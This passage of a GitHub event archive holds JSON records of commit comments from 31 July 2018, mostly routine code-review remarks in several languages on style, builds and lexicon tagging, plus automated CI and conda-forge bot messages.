:003?>   end\r\n => :some_method\r\n2.5.0 :004 > some_method\r\n3\r\n => nil\r\n2.5.0 :005 > a = some_method\r\n3\r\n => nil\r\n2.5.0 :006 > a\r\n => nil\r\n2.5.0 :007 >\r\n```\r\nи на этом примере видно, что хотя метод и **выводит** результат вычислений в консоль, но **возвращает** он `nil`, потому что именно это значение **возвращает** метод `puts`, который выполняется в последней строке нашего метода и в переменную присваивается возвращаемое методом значение, т.е. `nil`"}},"created_at":"2018-07-31T10:40:50Z"}
{"id":"8043234633","type":"CommitCommentEvent","actor":{"login":"code-warrior"},"repo":{"name":"code-warrior/assignment-2--web-design-at-risd--summer-2018--schedule-3"},"payload":{"comment":{"id":29901786,"position":5,"line":6,"path":"css/style.css","commit_id":"fc50c5be9f9b9d96be4667f025e32ef582ddb5b5","created_at":"2018-07-31T10:40:59Z","updated_at":"2018-07-31T10:40:59Z","author_association":"OWNER","body":"Please remove the extra semicolon."}},"created_at":"2018-07-31T10:40:59Z"}
{"id":"8043238917","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29901796,"position":10,"line":193,"path":"addons/purchase/models/stock.py","commit_id":"3869cdf7d8202c8157c1134d74549b3096758253","created_at":"2018-07-31T10:41:55Z","updated_at":"2018-07-31T10:41:55Z","author_association":"CONTRIBUTOR","body":"OK, thanks for letting me know. I will take into account for other similar cases. We are being P3 only on v11 though on OCA FYI."}},"created_at":"2018-07-31T10:41:55Z"}
{"id":"8043239258","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29901798,"position":29,"line":29,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/web/js/form.js","commit_id":"5356395f6a9726c8cbeefe20629523cc38556e86","created_at":"2018-07-31T10:42:00Z","updated_at":"2018-07-31T10:42:00Z","author_association":"OWNER","body":"From parameter"}},"created_at":"2018-07-31T10:42:00Z"}
{"id":"8043242110","type":"CommitCommentEvent","actor":{"login":"code-warrior"},"repo":{"name":"code-warrior/assignment-2--web-design-at-risd--summer-2018--schedule-3"},"payload":{"comment":{"id":29901808,"position":4,"line":5,"path":"css/style.css","commit_id":"fc50c5be9f9b9d96be4667f025e32ef582ddb5b5","created_at":"2018-07-31T10:42:38Z","updated_at":"2018-07-31T10:42:38Z","author_association":"OWNER","body":"All rules should simulate the examples in class. For example, this rule should be formatted as…\r\n\r\n```css\r\nbody {\r\n   background-image: url(../img/arvo.jpg);\r\n   background-position: center;\r\n   background-repeat: no-repeat;\r\n}\r\n```"}},"created_at":"2018-07-31T10:42:38Z"}
{"id":"8043246554","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901821,"position":28,"line":28,"path":"lesson3/train.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:43:37Z","updated_at":"2018-07-31T10:43:37Z","author_association":"NONE","body":"если вагонов уже нет - не стоит наверное уходить в минус ? ))"}},"created_at":"2018-07-31T10:43:37Z"}
{"id":"8043247229","type":"CommitCommentEvent","actor":{"login":"templecloud"},"repo":{"name":"oracle/oci-cloud-controller-manager"},"payload":{"comment":{"id":29901824,"position":null,"line":null,"path":null,"commit_id":"169251386a82b727e07f0e2d7db4a86313849883","created_at":"2018-07-31T10:43:46Z","updated_at":"2018-07-31T10:43:46Z","author_association":"MEMBER","body":"I made all of the changes suggested from the previous and tidied up a few of the messier polling function. I also updated the wercker pipelines to use 'after-steps' to make sure the CCM gets rolled backed to the original regardless of success or failure. Finally, I re-squashed the commits."}},"created_at":"2018-07-31T10:43:46Z"}
{"id":"8043247241","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29901825,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-31T10:43:46Z","updated_at":"2018-07-31T10:43:46Z","author_association":"OWNER","body":"Thanks Stefan, @snicolet how do you see it? I can open a proper PR in a week, until then I only have access to my smartphone."}},"created_at":"2018-07-31T10:43:46Z"}
{"id":"8043248131","type":"CommitCommentEvent","actor":{"login":"stahor"},"repo":{"name":"kremen/ruby-style-guide"},"payload":{"comment":{"id":29901826,"position":5,"line":276,"path":"README.md","commit_id":"2efa36ff073eb248f89e53090c46770892bb97f9","created_at":"2018-07-31T10:43:58Z","updated_at":"2018-07-31T10:43:58Z","author_association":"NONE","body":"Хз, а я за то, чтобы хэши были без пробелов. Ты же не втыкаешь пробелы в массивы?  + так они будут визуально отличаться от блоков."}},"created_at":"2018-07-31T10:43:58Z"}
{"id":"8043256315","type":"CommitCommentEvent","actor":{"login":"falexwolf"},"repo":{"name":"theislab/anndata"},"payload":{"comment":{"id":29901843,"position":29,"line":710,"path":"anndata/base.py","commit_id":"8a84861ad9ef98c7b750cddfb3bb0e60fd310ba4","created_at":"2018-07-31T10:45:39Z","updated_at":"2018-07-31T10:45:39Z","author_association":"MEMBER","body":"This needs subsetting... just as for .X"}},"created_at":"2018-07-31T10:45:39Z"}
{"id":"8043256604","type":"CommitCommentEvent","actor":{"login":"stahor"},"repo":{"name":"kremen/ruby-style-guide"},"payload":{"comment":{"id":29901844,"position":23,"line":590,"path":"README.md","commit_id":"2efa36ff073eb248f89e53090c46770892bb97f9","created_at":"2018-07-31T10:45:43Z","updated_at":"2018-07-31T10:45:43Z","author_association":"NONE","body":":+1: это позволяет тебе копипастить код в консоль без изменений. А то, что это продолжение предыдущей строки, можно понять по отступам"}},"created_at":"2018-07-31T10:45:43Z"}
{"id":"8043257780","type":"CommitCommentEvent","actor":{"login":"falexwolf"},"repo":{"name":"theislab/anndata"},"payload":{"comment":{"id":29901851,"position":38,"line":744,"path":"anndata/base.py","commit_id":"8a84861ad9ef98c7b750cddfb3bb0e60fd310ba4","created_at":"2018-07-31T10:45:59Z","updated_at":"2018-07-31T10:45:59Z","author_association":"MEMBER","body":"no whitespace around kwd params"}},"created_at":"2018-07-31T10:45:59Z"}
{"id":"8043259033","type":"CommitCommentEvent","actor":{"login":"Quraishi09786"},"repo":{"name":"Quraishi09786/LearningDemo"},"payload":{"comment":{"id":29901854,"position":null,"line":null,"path":null,"commit_id":"45b4a4db6e271fa30a86b83b8ccccf8e89e8eb98","created_at":"2018-07-31T10:46:14Z","updated_at":"2018-07-31T10:46:14Z","author_association":"OWNER","body":"initial commit"}},"created_at":"2018-07-31T10:46:14Z"}
{"id":"8043261487","type":"CommitCommentEvent","actor":{"login":"kulpreet"},"repo":{"name":"ChluNetwork/chlu-ipfs-support"},"payload":{"comment":{"id":29901860,"position":null,"line":null,"path":null,"commit_id":"e9a35bd53ac26f39875e5dd9c6f52a4c73f73b27","created_at":"2018-07-31T10:46:47Z","updated_at":"2018-07-31T10:46:47Z","author_association":"CONTRIBUTOR","body":"We might not be able to escape it. I think if we are to align ourselves with the CCG and the VC specs we will have to have the jsonld based normalization. This will impact our use of protobufs and something we need to be mindful of."}},"created_at":"2018-07-31T10:46:47Z"}
{"id":"8043269811","type":"CommitCommentEvent","actor":{"login":"vikramkrishn"},"repo":{"name":"vikramkrishn/demo"},"payload":{"comment":{"id":29901870,"position":1,"line":1,"path":"vik.txt","commit_id":"a8c9e2359209b8465aca8c0b5008ac66c7715780","created_at":"2018-07-31T10:48:33Z","updated_at":"2018-07-31T10:48:33Z","author_association":"OWNER","body":"correct name"}},"created_at":"2018-07-31T10:48:33Z"}
{"id":"8043269845","type":"CommitCommentEvent","actor":{"login":"dpnkrg"},"repo":{"name":"dpnkrg/demoproject"},"payload":{"comment":{"id":29901871,"position":1,"line":1,"path":"FirstFile.txt","commit_id":"f12977667f7a6bab37b7c803b8b2bb7b1857fe14","created_at":"2018-07-31T10:48:33Z","updated_at":"2018-07-31T10:48:33Z","author_association":"OWNER","body":"this my old name"}},"created_at":"2018-07-31T10:48:33Z"}
{"id":"8043270183","type":"CommitCommentEvent","actor":{"login":"nitishw229"},"repo":{"name":"nitishw229/DemoProject"},"payload":{"comment":{"id":29901874,"position":2,"line":1,"path":"FirstFile.txt","commit_id":"1e528fbcac1740484fc1796e14da883fbb6e5e36","created_at":"2018-07-31T10:48:37Z","updated_at":"2018-07-31T10:48:37Z","author_association":"OWNER","body":"this Is my Old Name"}},"created_at":"2018-07-31T10:48:37Z"}
{"id":"8043270832","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29901879,"position":null,"line":null,"path":null,"commit_id":"03985f783048a4d9d0bbd58b9df157ced198b781","created_at":"2018-07-31T10:48:46Z","updated_at":"2018-07-31T10:48:46Z","author_association":"COLLABORATOR","body":"Post / Pre \r\n\r\n<img width=\"1277\" alt=\"dontscaletexture\" src=\"https://user-images.githubusercontent.com/25286924/43455421-08d23c22-94c0-11e8-9be8-1e115fc7dcd2.png\">\r\n"}},"created_at":"2018-07-31T10:48:46Z"}
{"id":"8043271369","type":"CommitCommentEvent","actor":{"login":"luziferius"},"repo":{"name":"autokey/autokey"},"payload":{"comment":{"id":29901881,"position":5,"line":408,"path":"lib/autokey/service.py","commit_id":"abf33455a2d2c6ae2ae848c6621f19564392340f","created_at":"2018-07-31T10:48:53Z","updated_at":"2018-07-31T10:48:53Z","author_association":"COLLABORATOR","body":"Only checked if an abbreviation is assigned, not if it was actually triggered by said abbreviation."}},"created_at":"2018-07-31T10:48:53Z"}
{"id":"8043271467","type":"CommitCommentEvent","actor":{"login":"Pratiksha2692"},"repo":{"name":"Pratiksha2692/demo_project"},"payload":{"comment":{"id":29901882,"position":1,"line":1,"path":"first file.txt","commit_id":"f9d3b65507d32c1713f99f0442f4c83f9299f034","created_at":"2018-07-31T10:48:54Z","updated_at":"2018-07-31T10:48:54Z","author_association":"OWNER","body":"This is my old name"}},"created_at":"2018-07-31T10:48:54Z"}
{"id":"8043272197","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29901883,"position":19,"line":19,"path":"6-15.cpp","commit_id":"4babd850030784b2bc8602f08c1c7113b4544de8","created_at":"2018-07-31T10:49:03Z","updated_at":"2018-07-31T10:49:03Z","author_association":"COLLABORATOR","body":"関数ヘッダがありません。\r\n作成してください(平澤)"}},"created_at":"2018-07-31T10:49:03Z"}
{"id":"8043272424","type":"CommitCommentEvent","actor":{"login":"kmeaswar"},"repo":{"name":"kmeaswar/aegis-cicd"},"payload":{"comment":{"id":29901884,"position":null,"line":null,"path":null,"commit_id":"97e44098a5c18a6f978ce8ad490b2597db4e71ba","created_at":"2018-07-31T10:49:05Z","updated_at":"2018-07-31T10:49:05Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-31T10:49:05Z"}
{"id":"8043283891","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/bravado-feedstock"},"payload":{"comment":{"id":29901901,"position":null,"line":null,"path":null,"commit_id":"9787abb5925e807367518fef8caa4954c2d5f3b7","created_at":"2018-07-31T10:51:29Z","updated_at":"2018-07-31T10:51:29Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @chapmanb was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-31T10:51:29Z"}
{"id":"8043288774","type":"CommitCommentEvent","actor":{"login":"dice-k-nakatani"},"repo":{"name":"elastic/elasticsearch-rails"},"payload":{"comment":{"id":29901909,"position":null,"line":null,"path":null,"commit_id":"8508577ab0fa33934cc678af426f498e56aa7e3d","created_at":"2018-07-31T10:52:30Z","updated_at":"2018-07-31T10:52:30Z","author_association":"NONE","body":"This causes too much memory consuming...\r\nIf mongodb's collection is very much, `all.no_timeout.each_slice` would load all record to memory.\r\n\r\nThe implementation before commit: 8508577ab0fa33934cc678af426f498e56aa7e3d would be better.\r\n"}},"created_at":"2018-07-31T10:52:30Z"}
{"id":"8043297105","type":"CommitCommentEvent","actor":{"login":"dpisklov"},"repo":{"name":"OpenHFT/Chronicle-Queue"},"payload":{"comment":{"id":29901925,"position":26,"line":438,"path":"src/main/java/net/openhft/chronicle/queue/impl/AbstractChronicleQueueBuilder.java","commit_id":"35d288d054cb32844772f940ce64822fe09a52c2","created_at":"2018-07-31T10:54:19Z","updated_at":"2018-07-31T10:54:19Z","author_association":"CONTRIBUTOR","body":"Why do we need Clonable for a builder?"}},"created_at":"2018-07-31T10:54:19Z"}
{"id":"8043306416","type":"CommitCommentEvent","actor":{"login":"RedAlex"},"repo":{"name":"ESX-PUBLIC/esx_joblogs"},"payload":{"comment":{"id":29901940,"position":null,"line":null,"path":null,"commit_id":"34a8788e747e50c13e031891c493c589a38974f3","created_at":"2018-07-31T10:56:16Z","updated_at":"2018-07-31T10:56:16Z","author_association":"COLLABORATOR","body":"Faut croire que je devais avoir les yeux fermer quand j'ai fais ça haha"}},"created_at":"2018-07-31T10:56:16Z"}
{"id":"8043310526","type":"CommitCommentEvent","actor":{"login":"glockett"},"repo":{"name":"glockett/Desk.com_api"},"payload":{"comment":{"id":29901944,"position":null,"line":null,"path":null,"commit_id":"78fe8f4a0ec4c8f36eff5e33628714c0be20c327","created_at":"2018-07-31T10:57:10Z","updated_at":"2018-07-31T10:57:10Z","author_association":"OWNER","body":"New file added"}},"created_at":"2018-07-31T10:57:10Z"}
{"id":"8043315606","type":"CommitCommentEvent","actor":{"login":"NochEinKamel"},"repo":{"name":"renebock/wonder"},"payload":{"comment":{"id":29901953,"position":13,"line":400,"path":"Frameworks/Core/ERExtensions/Sources/er/extensions/eof/ERXObjectStoreCoordinatorSynchronizer.java","commit_id":"5a8beeecfc902800f3d50824dd77e0e63ae785a5","created_at":"2018-07-31T10:58:05Z","updated_at":"2018-07-31T10:58:05Z","author_association":"COLLABORATOR","body":"tbh. we didn't receive any feedback on the mailing list or the guthib issue and wanted to do a quick try in our wonder fork – so the property is basically just a failsafe to quickly toggle the fix.\r\n\r\nSo far we didn't encounter any negative sideeffects."}},"created_at":"2018-07-31T10:58:05Z"}
{"id":"8043317238","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29901960,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T10:58:24Z","updated_at":"2018-07-31T10:58:24Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.25%25-green.png)</a>\n"}},"created_at":"2018-07-31T10:58:24Z"}
{"id":"8043318123","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29901966,"position":null,"line":null,"path":null,"commit_id":"34a0f8f3430d7061c304a7882904b6b8a69abd20","created_at":"2018-07-31T10:58:37Z","updated_at":"2018-07-31T10:58:37Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - Win64-Windows-7-VisualStudio-14: OK (2959 of 2959 tests passed, 2 test warnings)\n\nMessages:\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T10:58:37Z"}
{"id":"8043321443","type":"CommitCommentEvent","actor":{"login":"witsch"},"repo":{"name":"ZeitOnline/zeit.retresco"},"payload":{"comment":{"id":29901970,"position":null,"line":null,"path":null,"commit_id":"33bf2cd1e955784daa159fbe2bb39082daaa5080","created_at":"2018-07-31T10:59:22Z","updated_at":"2018-07-31T10:59:22Z","author_association":"CONTRIBUTOR","body":"Super Fund! (oder wie übersetzt man das richtig!? 😂), aber wie Du schon meintest, sollen wir das nicht gleich komplett rauswerfen (und die URL in `zeit.find` zusammenbauen)?  Also für's nächste Mal...  oder benutzen wir das noch an anderen Stellen?"}},"created_at":"2018-07-31T10:59:22Z"}
{"id":"8043321645","type":"CommitCommentEvent","actor":{"login":"kabhang"},"repo":{"name":"kabhang/Fuse-Theme-New"},"payload":{"comment":{"id":29901971,"position":null,"line":null,"path":null,"commit_id":"850453af355d6be643d8c5f3a4c5b4b8a69cd4b2","created_at":"2018-07-31T10:59:24Z","updated_at":"2018-07-31T10:59:24Z","author_association":"OWNER","body":"commit changes"}},"created_at":"2018-07-31T10:59:24Z"}
{"id":"8043324635","type":"CommitCommentEvent","actor":{"login":"dhananjayharel"},"repo":{"name":"dhananjayharel/MovieFinder"},"payload":{"comment":{"id":29901977,"position":null,"line":null,"path":null,"commit_id":"1ca26a672d90e92d08550df3dd2702f417112e72","created_at":"2018-07-31T11:00:02Z","updated_at":"2018-07-31T11:00:02Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-31T11:00:02Z"}
{"id":"8043325275","type":"CommitCommentEvent","actor":{"login":"lbrichards"},"repo":{"name":"lbrichards/hp"},"payload":{"comment":{"id":29901984,"position":null,"line":null,"path":null,"commit_id":"ffd0b885eed3e0988feb4351826e112c1ade3e7b","created_at":"2018-07-31T11:00:10Z","updated_at":"2018-07-31T11:00:10Z","author_association":"OWNER","body":"initial theme commit"}},"created_at":"2018-07-31T11:00:10Z"}
{"id":"8043327485","type":"CommitCommentEvent","actor":{"login":"gdsotirov"},"repo":{"name":"mysql/mysql-connector-odbc"},"payload":{"comment":{"id":29901991,"position":412,"line":600,"path":"configure.cmake","commit_id":"b9ab968980d495fb4f0ec46973834acc325507c1","created_at":"2018-07-31T11:00:34Z","updated_at":"2018-07-31T11:00:34Z","author_association":"NONE","body":"Why was this removed? It breaks build under Slackware Linux."}},"created_at":"2018-07-31T11:00:34Z"}
{"id":"8043329813","type":"CommitCommentEvent","actor":{"login":"CornelPanic"},"repo":{"name":"CornelPanic/WebServicesExample"},"payload":{"comment":{"id":29901996,"position":4,"line":10,"path":"ConsoleApp1/ConsoleApp1/Program.cs","commit_id":"a0be6cd05cba0cb470ca1389e9a5006586237d14","created_at":"2018-07-31T11:01:02Z","updated_at":"2018-07-31T11:01:02Z","author_association":"OWNER","body":"Added a **line**"}},"created_at":"2018-07-31T11:01:02Z"}
{"id":"8043333237","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29901998,"position":28,"line":19619,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:01:43Z","updated_at":"2018-07-31T11:01:43Z","author_association":"COLLABORATOR","body":"there's something weird going on here"}},"created_at":"2018-07-31T11:01:43Z"}
{"id":"8043333259","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29901999,"position":26,"line":26,"path":"6-18.cpp","commit_id":"6fd786941bf7715e75f4765024c8aed84ff674f1","created_at":"2018-07-31T11:01:43Z","updated_at":"2018-07-31T11:01:43Z","author_association":"COLLABORATOR","body":"関数を呼び出した回数で初回フラグを立てるのはあまり宜しくないです。\r\nint 型の正の範囲値は32767(確か)の為、それ以上繰り返したときの動作が保障されなくなります。(平澤)"}},"created_at":"2018-07-31T11:01:43Z"}
{"id":"8043334491","type":"CommitCommentEvent","actor":{"login":"atifnawaz08"},"repo":{"name":"zhemao/sockit_test"},"payload":{"comment":{"id":29902003,"position":null,"line":null,"path":null,"commit_id":"eb13166530082bcbe42a21ae07f505a46eb4c4ac","created_at":"2018-07-31T11:02:00Z","updated_at":"2018-07-31T11:02:00Z","author_association":"NONE","body":"Hi, I am following your online Blog to program Cyclone V FPGA from HPS. I have made the sys in Qsys as guided in your tutorial but as soon as I tried to generate HDL, I am getting the following error. Interface must have associated reset delay_ctrl_0.avalon_slave= must declare an associated reset"}},"created_at":"2018-07-31T11:02:00Z"}
{"id":"8043338584","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902013,"position":132,"line":19693,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:02:54Z","updated_at":"2018-07-31T11:02:54Z","author_association":"COLLABORATOR","body":"This looks like it shouldn't be an adjective anyway"}},"created_at":"2018-07-31T11:02:54Z"}
{"id":"8043339372","type":"CommitCommentEvent","actor":{"login":"ANTONIOCARBONELLDIAZ"},"repo":{"name":"ANTONIOCARBONELLDIAZ/OUTNOVA"},"payload":{"comment":{"id":29902016,"position":null,"line":null,"path":null,"commit_id":"df01d2eceeb7b81a9c75cf1ecf8b2ae2af915b8b","created_at":"2018-07-31T11:03:04Z","updated_at":"2018-07-31T11:03:04Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [df](https://trello.com/c/r8kWdfTT/1-df)"}},"created_at":"2018-07-31T11:03:04Z"}
{"id":"8043339992","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902017,"position":84,"line":19659,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:03:12Z","updated_at":"2018-07-31T11:03:12Z","author_association":"COLLABORATOR","body":"Use/MT"}},"created_at":"2018-07-31T11:03:12Z"}
{"id":"8043341553","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902022,"position":28,"line":19619,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:03:30Z","updated_at":"2018-07-31T11:03:30Z","author_association":"COLLABORATOR","body":"oh yeah, my bad."}},"created_at":"2018-07-31T11:03:30Z"}
{"id":"8043342895","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902025,"position":164,"line":19714,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:03:48Z","updated_at":"2018-07-31T11:03:48Z","author_association":"COLLABORATOR","body":"A4 definitely :D "}},"created_at":"2018-07-31T11:03:48Z"}
{"id":"8043343443","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29902028,"position":null,"line":null,"path":null,"commit_id":"0c9aefa726c7f2d94c869042697d3624f729d1a4","created_at":"2018-07-31T11:03:55Z","updated_at":"2018-07-31T11:03:55Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T11:03:55Z"}
{"id":"8043343812","type":"CommitCommentEvent","actor":{"login":"zauguin"},"repo":{"name":"u-fischer/lua-font-pond"},"payload":{"comment":{"id":29902033,"position":null,"line":null,"path":null,"commit_id":"3b60d41ce4e388be01828f07f09d597de5cf8af7","created_at":"2018-07-31T11:04:00Z","updated_at":"2018-07-31T11:04:00Z","author_association":"COLLABORATOR","body":"I added a commit probably fixing this but I couldn't test on Windows. If this leads to any more problems we can just revert it, disabled `texmf_casefold_search` is probably an edge case anyway."}},"created_at":"2018-07-31T11:04:00Z"}
{"id":"8043344675","type":"CommitCommentEvent","actor":{"login":"kyllingstad"},"repo":{"name":"markaren/vcpkg"},"payload":{"comment":{"id":29902034,"position":null,"line":null,"path":null,"commit_id":"cd900dcd775dcb212e84dfb60b044291a1b74b4a","created_at":"2018-07-31T11:04:12Z","updated_at":"2018-07-31T11:04:12Z","author_association":"NONE","body":"Ser ut som at vi har gjort dobbelt arbeid her:\r\nhttps://github.com/kyllingstad/vcpkg/tree/fmi-library/ports/fmi-library\r\n:-)\r\n\r\nMen det virker som at du har gått en del grundigere til verks. Jeg er på mobil og har derfor vanskelig for å se grundig på det akkurat nå, men sånn ved første øyekast ser det bra ut! Jeg husker ikke om jeg gjorde noe spesielt for å få det til å funke på Linux, men jeg mener bestemt at det gjorde det. Du kan jo sammenligne portfilene våre og se om du ser noen essensielle forskjeller."}},"created_at":"2018-07-31T11:04:12Z"}
{"id":"8043345278","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902037,"position":102,"line":19671,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:04:20Z","updated_at":"2018-07-31T11:04:20Z","author_association":"COLLABORATOR","body":"Use/MT"}},"created_at":"2018-07-31T11:04:20Z"}
{"id":"8043346216","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902039,"position":109,"line":19677,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:04:32Z","updated_at":"2018-07-31T11:04:32Z","author_association":"COLLABORATOR","body":"Use/MT"}},"created_at":"2018-07-31T11:04:32Z"}
{"id":"8043348048","type":"CommitCommentEvent","actor":{"login":"dbradul"},"repo":{"name":"ismelyanets/python_hw"},"payload":{"comment":{"id":29902043,"position":7,"line":7,"path":"hw_35.py","commit_id":"285785a737ed24f63a3ad84708b1e1c0122ed0b5","created_at":"2018-07-31T11:04:54Z","updated_at":"2018-07-31T11:04:54Z","author_association":"NONE","body":"Лучше возвращать булевое значения для гибкости (интернационализация, использование результата проверки).\r\nТакже луше передавать в этот метод не координаты, а точку, а внутри уже читать ее координаты. Так проще, нагляднее и безопастнее."}},"created_at":"2018-07-31T11:04:54Z"}
{"id":"8043350119","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902045,"position":272,"line":19820,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:05:20Z","updated_at":"2018-07-31T11:05:20Z","author_association":"COLLABORATOR","body":"This might have become A1 rather recently due to political discourse :D"}},"created_at":"2018-07-31T11:05:20Z"}
{"id":"8043350855","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902046,"position":282,"line":19827,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:05:30Z","updated_at":"2018-07-31T11:05:30Z","author_association":"COLLABORATOR","body":"A4"}},"created_at":"2018-07-31T11:05:30Z"}
{"id":"8043351180","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902048,"position":279,"line":19825,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:05:34Z","updated_at":"2018-07-31T11:05:34Z","author_association":"COLLABORATOR","body":"A4"}},"created_at":"2018-07-31T11:05:34Z"}
